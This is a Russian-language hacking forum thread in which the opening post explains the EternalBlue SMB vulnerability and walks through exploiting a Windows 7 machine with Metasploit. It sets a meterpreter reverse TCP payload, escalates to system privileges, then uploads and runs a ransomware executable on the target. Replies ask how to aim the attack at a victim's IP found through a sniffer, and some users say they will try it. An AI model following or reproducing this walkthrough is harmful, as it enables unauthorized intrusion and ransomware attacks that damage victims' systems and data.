• Начинающий хакер, спасибо что зашёл к нам! Для полного удобства рекомендуем Вам сразу же зарегистрироваться. Помните, необходимо придумать сложный пароль к своему логину, в котором будут присутствовать цифры, а так же символы. После регистрации вы сможете пользоваться чатом. Так же не забудьте активировать аккаунт через письмо, высланное вам на почту ! Администрация заботится о каждом из Вас...
  • Для просмотра разделов из категории Private Informations & Programms необходимо купить

Взлом Windows PC

  • Автор темы Автор темы Ydod
  • Дата начала Дата начала
  • Просмотры Просмотры 1,226
Статус
В этой теме нельзя размещать новые ответы.

Ydod

Ydod

Заблокированый
Заблокированый
Регистрация
29 Май 2017
Сообщения
0
Реакции
243
Всем привет! Наверняка многие из вас слышали про EternalBlue (или ETERNALBLUE[1], CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, к разработке которого, как считается, причастно Агентство национальной безопасности (США). Секретные сведения об уязвимости и исполняемый код эксплойта были опубликованы хакерской группой The Shadow Brokers 14 апреля 2017 года. Уязвимость была использована при распространении вредоносного ПО WannaCry в мае 2017 года. В этой статье я бы хотел обратить на него внимание, и попробовать в действии.



В последней версии Metasploit Framework присутствует, необходимый нам, для этого модуль.

Этот модуль является портом эксплойта группы ETERNALBLUE, частью инструментария FuzzBunch, выпущенного Shadow Brokers. Существует операция переполнения буфера в Srv! SrvOs2FeaToNt. Размер вычисляется в Srv! SrvOs2FeaListSizeToNt, с математической ошибкой, когда DWORD вычитается в WORD. Пул ядра подготовлен так, чтобы переполнение было хорошо продуманно, чтобы перезаписать буфер SMBv1. Фактический захват RIP будет завершен позже в srvnet! SrvNetWskReceiveComplete. Этот эксплоит, как и оригинал, может не срабатывать с 100% шансом в течение определенного промежутка времени, и должен запускаться непрерывно до момента срабатывания.

Приступим к осуществлению, в качестве атакующего хоста Kali Linux 2017.1, в качестве цели Windows 7.

> msfupdate



> msfconsole

> use exploit/windows/smb/ms17_010_eternalblue

> msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.105

> msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21

> msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

> msf exploit(ms17_010_eternalblue) >exploit



Эксплоит срабатывает на отлично, получаем системные привилегии:

> getsystem

> getuid



Немного усугубим ситуацию, закинув целевому хосту вирус-вымогатель (аналог WannaCry)



> upload /root/ransomware.exe C:\\

> shell

> cd C:\\

> ransomware.exe



И как итог:



Вот собственно, и все. Спасибо за внимание.
 

IvanVitebsk

Пользователь

IvanVitebsk

Пользователь
Пользователь
Пользователь
Регистрация
26 Май 2017
Сообщения
29
Реакции
0
годнота подьехала) лойс
 

RekpyT

Пользователь

RekpyT

Пользователь
Топовый
Топовый
Регистрация
3 Фев 2017
Сообщения
382
Реакции
35
я что то не совсем понял достаточно в эксплойт в бить ip или нужны открытые порты ?
 

4QSN1K

ШКОЛОЛОТРОН

4QSN1K

ШКОЛОЛОТРОН
Топовый
Топовый
Регистрация
25 Май 2017
Сообщения
317
Реакции
109
[USERS=bold222]эта атака осуществима только по локальной сети выходит что ли? Или на конкретный IP тоже возможно? Допустим пробили мы IP жертвы через снифер/логер и начать сканировать порты по этому IP, не? [/USERS]
 

Ydod

Ydod

Заблокированый
Заблокированый
Регистрация
29 Май 2017
Сообщения
0
Реакции
243
возможно, я лично с этим не работал
 

Ydod

Ydod

Заблокированый
Заблокированый
Регистрация
29 Май 2017
Сообщения
0
Реакции
243

4QSN1K

ШКОЛОЛОТРОН

4QSN1K

ШКОЛОЛОТРОН
Топовый
Топовый
Регистрация
25 Май 2017
Сообщения
317
Реакции
109
@bold222, не могу не согласиться.
 

4QSN1K

ШКОЛОЛОТРОН

4QSN1K

ШКОЛОЛОТРОН
Топовый
Топовый
Регистрация
25 Май 2017
Сообщения
317
Реакции
109

Renelio

Зеленый человечек

Renelio

Зеленый человечек
Elite Premium
Elite Premium
Регистрация
25 Май 2017
Сообщения
225
Реакции
78
Спасибо, попробуемс
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху Снизу